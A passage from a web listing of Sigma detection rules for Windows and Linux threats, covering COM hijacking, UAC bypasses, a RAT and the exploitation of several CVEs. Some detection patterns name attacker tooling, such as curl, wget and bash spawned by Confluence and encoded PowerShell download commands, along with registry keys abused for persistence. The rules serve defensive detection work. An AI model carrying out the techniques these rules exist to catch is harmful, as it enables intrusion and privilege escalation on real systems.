            - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl
        IntegrityLevel:
            - 'High'
            - 'System'
            - 'S-1-16-16384' # System
            - 'S-1-16-12288' # High
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high
high
Moderate
Medium FP
COLDSTEEL RAT Anonymous User Process Execution
Detects the creation of a process executing as a user called "ANONYMOUS", as seen used by the "MileStone2016" variant of COLDSTEEL
title: COLDSTEEL RAT Anonymous User Process Execution
id: e01b6eb5-1eb4-4465-a165-85d40d874add
status: test
description: Detects the creation of a process executing as a user called "ANONYMOUS", as seen used by the "MileStone2016" variant of COLDSTEEL
references:
    - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/cold-steel/NCSC-MAR-Cold-Steel.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-30
tags:
    - attack.persistence
    - detection.emerging-threats
    - attack.stealth
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|contains:
            - '\Windows\System32\'
            - '\AppData\'
        User|contains: 'ANONYMOUS'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Moderate
High FP
COM Hijack via Sdclt
Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
title: COM Hijack via Sdclt
id: 07743f65-7ec9-404a-a519-913db7118a8d
status: test
description: Detects changes to 'HKCU\Software\Classes\Folder\shell\open\command\DelegateExecute'
references:
    - http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass
    - https://www.exploit-db.com/exploits/47696
author: Omkar Gudhate
date: 2020-09-27
modified: 2023-09-28
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1546
    - attack.t1548
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|contains: '\Software\Classes\Folder\shell\open\command\DelegateExecute'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Moderate
Medium FP
COM Object Hijacking Via Modification Of Default System CLSID Default Value
Detects potential COM object hijacking via modification of default system CLSID.
title: COM Object Hijacking Via Modification Of Default System CLSID Default Value
id: 790317c0-0a36-4a6a-a105-6e576bf99a14
related:
    - id: 3d968d17-ffa4-4bc0-bfdc-f139de76ce77
      type: obsolete
    - id: a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12
      type: obsolete
status: experimental
description: Detects potential COM object hijacking via modification of default system CLSID.
references:
    - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)
    - https://unit42.paloaltonetworks.com/snipbot-romcom-malware-variant/
    - https://blog.talosintelligence.com/uat-5647-romcom/
    - https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/darkhotel-a-cluster-of-groups-united-by-common-techniques
    - https://threatbook.io/blog/Analysis-of-APT-C-60-Attack-on-South-Korea
    - https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis
    - https://github.com/rtecCyberSec/BitlockMove
    - https://cert.gov.ua/article/6284080
    - https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2024-07-16
modified: 2025-11-10
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1546.015
logsource:
    category: registry_set
    product: windows
detection:
    selection_target_root:
        TargetObject|contains: '\CLSID\'
        TargetObject|endswith:
            - '\InprocServer32\(Default)'
            - '\LocalServer32\(Default)'
    selection_target_builtin_clsid:
        TargetObject|contains:
            # Note: Add other legitimate CLSID
            - '\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\'
            - '\{2155fee3-2419-4373-b102-6843707eb41f}\'
            - '\{4590f811-1d3a-11d0-891f-00aa004b2e24}\'
            - '\{4de225bf-cf59-4cfc-85f7-68b90f185355}\'
            - '\{ddc05a5a-351a-4e06-8eaf-54ec1bc2dcea}\'
            - '\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\'
            - '\{F82B4EF1-93A9-4DDE-8015-F7950A1A6E31}\'
            - '\{7849596a-48ea-486e-8937-a2a3009f31a9}\'
            - '\{0b91a74b-ad7c-4a9d-b563-29eef9167172}\'
            - '\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\'
            - '\{30D49246-D217-465F-B00B-AC9DDD652EB7}\'
            - '\{A7A63E5C-3877-4840-8727-C1EA9D7A4D50}\'
            - '\{2227A280-3AEA-1069-A2DE-08002B30309D}\'
            - '\{2DEA658F-54C1-4227-AF9B-260AB5FC3543}\'
            - '\{AA509086-5Ca9-4C25-8F95-589D3C07B48A}\'
    selection_susp_location_1:
        Details|contains:
            # Note: Add more suspicious paths and locations
            - ':\Perflogs\'
            - '\AppData\Local\'
            - '\Desktop\'
            - '\Downloads\'
            - '\Microsoft\Windows\Start Menu\Programs\Startup\'
            - '\System32\spool\drivers\color\' # as seen in the knotweed blog
            - '\Temporary Internet'
            - '\Users\Public\'
            - '\Windows\Temp\'
            - '%appdata%'
            - '%temp%'
            - '%tmp%'
    selection_susp_location_2:
        - Details|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - Details|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - Details|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - Details|contains|all:
              - ':\Users\'
              - '\Pictures\'
    condition: all of selection_target_* and 1 of selection_susp_location_*
falsepositives:
    - Unlikely
level: high
high
Strong
Medium FP
CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
view Sigma YAML
title: CVE-2020-1048 Exploitation Attempt - Suspicious New Printer Ports - Registry
id: 7ec912f2-5175-4868-b811-ec13ad0f8567
status: test
description: |
    Detects changes to the "Ports" registry key with data that includes a Windows path or a file with a suspicious extension.
    This could be an attempt to exploit CVE-2020-1048 - a Windows Print Spooler elevation of privilege vulnerability.
references:
    - https://windows-internals.com/printdemon-cve-2020-1048/
author: EagleEye Team, Florian Roth (Nextron Systems), NVISO
date: 2020-05-13
modified: 2024-03-25
tags:
    - attack.persistence
    - attack.execution
    - attack.defense-impairment
    - attack.t1112
    - cve.2020-1048
    - detection.emerging-threats
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains: '\Microsoft\Windows NT\CurrentVersion\Ports'
        Details|contains:
            - '.bat'
            - '.com'
            - '.dll'
            - '.exe'
            - '.ps1'
            - '.vbe'
            - '.vbs'
            - 'C:'
    condition: selection
falsepositives:
    - New printer port install on host
level: high
high
Moderate
Medium FP
CVE-2021-26858 Exchange Exploitation
Detects possible successful exploitation of the vulnerability described in CVE-2021-26858 by looking for the creation of non-standard files on disk by Exchange Server's Unified Messaging service, which could indicate the dropping of web shells or other malicious content.
view Sigma YAML
title: CVE-2021-26858 Exchange Exploitation
id: b06335b3-55ac-4b41-937e-16b7f5d57dfd
status: test
description: |
    Detects possible successful exploitation of the vulnerability described in CVE-2021-26858 by looking for
    the creation of non-standard files on disk by Exchange Server's Unified Messaging service,
    which could indicate the dropping of web shells or other malicious content.
references:
    - https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
author: Bhabesh Raj
date: 2021-03-03
modified: 2022-10-09
tags:
    - attack.t1203
    - attack.execution
    - cve.2021-26858
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Image|endswith: 'UMWorkerProcess.exe'
    filter:
        TargetFilename|endswith:
            - 'CacheCleanup.bin'
            - '.txt'
            - '.LOG'
            - '.cfg'
            - 'cleanup.bin'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
high
Moderate
High FP
CVE-2021-44077 POC Default Dropped File
Detects the creation of "msiexec.exe" in the "bin" directory of ManageEngine SupportCenter Plus, the default file dropped by the public POC for CVE-2021-44077 (see the references section).
view Sigma YAML
title: CVE-2021-44077 POC Default Dropped File
id: 7b501acf-fa98-4272-aa39-194f82edc8a3
status: test
description: Detects the creation of "msiexec.exe" in the "bin" directory of ManageEngine SupportCenter Plus, the default file dropped by the public POC for CVE-2021-44077 (see the references section).
references:
    - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/
    - https://github.com/horizon3ai/CVE-2021-44077/blob/b7a48e25824e8ead95e028475c7fd0e107e6e6bf/exploit.py
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-06
tags:
    - attack.execution
    - cve.2021-44077
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '\ManageEngine\SupportCenterPlus\bin\msiexec.exe'
    condition: selection
falsepositives:
    - Unlikely
level: high
high
Moderate
Medium FP
CVE-2022-24527 Microsoft Connected Cache LPE
Detects files created during exploitation of CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache.
view Sigma YAML
title: CVE-2022-24527 Microsoft Connected Cache LPE
id: e0a41412-c69a-446f-8e6e-0e6d7483dad7
status: test
description: Detects files created during exploitation of CVE-2022-24527, a local privilege escalation vulnerability in Microsoft Connected Cache.
references:
    - https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/
author: Florian Roth (Nextron Systems)
date: 2022-04-13
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.t1059.001
    - cve.2022-24527
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: 'WindowsPowerShell\Modules\webAdministration\webAdministration.psm1'
    filter:
        User|contains: # covers many language settings
            - 'AUTHORI'
            - 'AUTORI'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
high
Strong
Medium FP
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
Detects an exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), in which an attacker can abuse vulnerable endpoints to, for example, create admin accounts and execute arbitrary commands.
view Sigma YAML
title: CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux)
id: f8987c03-4290-4c96-870f-55e75ee377f4
related:
    - id: 1ddaa9a4-eb0b-4398-a9fe-7b018f9e23db
      type: similar
status: test
description: |
    Detects an exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), in which an attacker can abuse vulnerable endpoints to, for example, create admin accounts and execute arbitrary commands.
references:
    - https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html
    - https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment
    - https://github.com/ForceFledgling/CVE-2023-22518
author: Andreas Braathen (mnemonic.io)
date: 2023-11-14
tags:
    - attack.execution
    - attack.t1059
    - attack.initial-access
    - attack.t1190
    - cve.2023-22518
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection_parent:
        ParentImage|endswith: '/java'
        ParentCommandLine|contains: 'confluence'
    selection_child:
        # Only children associated with known campaigns
        Image|endswith:
            - '/bash'
            - '/curl'
            - '/echo'
            - '/wget'
    filter_main_ulimit:
        CommandLine|contains: 'ulimit -u'
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: high
high
Moderate
High FP
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
Detects the creation by WinRAR of a file with a double extension separated by a space. This could be a sign of exploitation of CVE-2023-38331.
view Sigma YAML
title: CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File
id: e4556676-fc5c-4e95-8c39-5ef27791541f
related:
    - id: ec3a3c2f-9bb0-4a9b-8f4b-5ec386544343
      type: similar
status: test
description: Detects the creation by WinRAR of a file with a double extension separated by a space. This could be a sign of exploitation of CVE-2023-38331.
references:
    - https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/
    - https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-08-30
tags:
    - attack.execution
    - cve.2023-38331
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Image|endswith: '\WinRAR.exe'
        TargetFilename|contains: '\AppData\Local\Temp\Rar$'
        TargetFilename|re: '\.[a-zA-Z0-9]{1,4} \.'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Moderate
Medium FP
CVE-2024-50623 Exploitation Attempt - Cleo
Detects an exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawned from the Cleo software suite with a suspicious PowerShell command line.
view Sigma YAML
title: CVE-2024-50623 Exploitation Attempt - Cleo
id: f007b877-02e3-45b7-8501-1b78c2864029
status: experimental
description: |
    Detects an exploitation attempt of Cleo's CVE-2024-50623 by looking for a "cmd.exe" process spawned from the Cleo software suite with a suspicious PowerShell command line.
references:
    - https://www.huntress.com/blog/threat-advisory-oh-no-cleo-cleo-software-actively-being-exploited-in-the-wild
author: Tanner Filip, Austin Worline, Chad Hudson, Matt Anderson
date: 2024-12-09
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1190
    - cve.2024-50623
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\javaw.exe'
        ParentCommandLine|contains:
            - 'Harmony'
            - 'lexicom'
            - 'VersaLex'
            - 'VLTrader'
        Image|endswith: '\cmd.exe'
        CommandLine|contains:
            - 'powershell'
            - ' -enc '
            - ' -EncodedCommand'
            - '.Download'
    condition: selection
falsepositives:
    - Unlikely
level: high
high
Strong
Medium FP
Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
view Sigma YAML
title: Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
id: c74c0390-3e20-41fd-a69a-128f0275a5ea
related:
    - id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9
      type: derived
status: test
description: |
    Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.
references:
    - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html
    - https://www.echotrail.io/insights/search/wusa.exe/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-05
modified: 2023-11-28
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_root:
        Image|endswith: '\wusa.exe'
        CommandLine|contains: '/extract:'
    selection_paths:
        CommandLine|contains:
            - ':\PerfLogs\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\Appdata\Local\Temp\'
            # - '\Desktop\'
            # - '\Downloads\'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
high
Moderate
Medium FP
Capsh Shell Invocation - Linux
Detects the use of the "capsh" utility to invoke a shell.
view Sigma YAML
title: Capsh Shell Invocation - Linux
id: db1ac3be-f606-4e3a-89e0-9607cbe6b98a
status: test
description: |
    Detects the use of the "capsh" utility to invoke a shell.
references:
    - https://gtfobins.github.io/gtfobins/capsh/#shell
    - https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html
author: Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)
date: 2024-09-02
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|endswith: '/capsh'
        CommandLine|endswith: ' --'
    condition: selection
falsepositives:
    - Unknown
level: high
high
Moderate
Medium FP
Change User Account Associated with the FAX Service
Detects a change of the user account associated with the FAX service, a change that can be abused for privilege escalation.
view Sigma YAML
title: Change User Account Associated with the FAX Service
id: e3fdf743-f05b-4051-990a-b66919be1743
status: test
description: Detects a change of the user account associated with the FAX service, a change that can be abused for privilege escalation.
references:
    - https://twitter.com/dottor_morte/status/1544652325570191361
    - https://raw.githubusercontent.com/RiccardoAncarani/talks/master/F-Secure/unorthodox-lateral-movement.pdf
author: frack113
date: 2022-07-17
modified: 2022-12-30
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject: HKLM\System\CurrentControlSet\Services\Fax\ObjectName
    filter:
        Details|contains: NetworkService
    condition: selection and not filter
falsepositives:
    - Unknown
level: high
Showing 1-50 of 763